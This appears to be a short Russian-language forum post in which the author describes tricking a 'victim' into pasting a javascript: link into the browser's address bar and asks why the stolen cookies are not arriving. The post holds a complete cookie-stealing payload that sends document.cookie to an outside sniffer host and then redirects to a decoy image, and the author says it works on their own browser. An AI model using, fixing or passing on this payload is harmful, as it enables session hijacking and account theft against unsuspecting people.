вообщем придумал способ как можно грамотно жертве впарить ссылку прямо в адресную строку. только проблема в том что куки не приходят, или у жертвы ссылка не открывается (говорят просто белая страница)
ссылку пишу вот эту javascript:document.write('img = new Image(); img.src = "http://httpz.ru/n8brbzadzlt.gif?"+document.cookie;var URL = "http://images.cards.mail.ru/11bolprivet.jpg";var speed = 8000;function reload() {document.location = URL}setTimeout("reload()", speed);')

причем когда я по ней перехожу, то у меня все нормально и в сниффере мой вход отображается, и куки лежат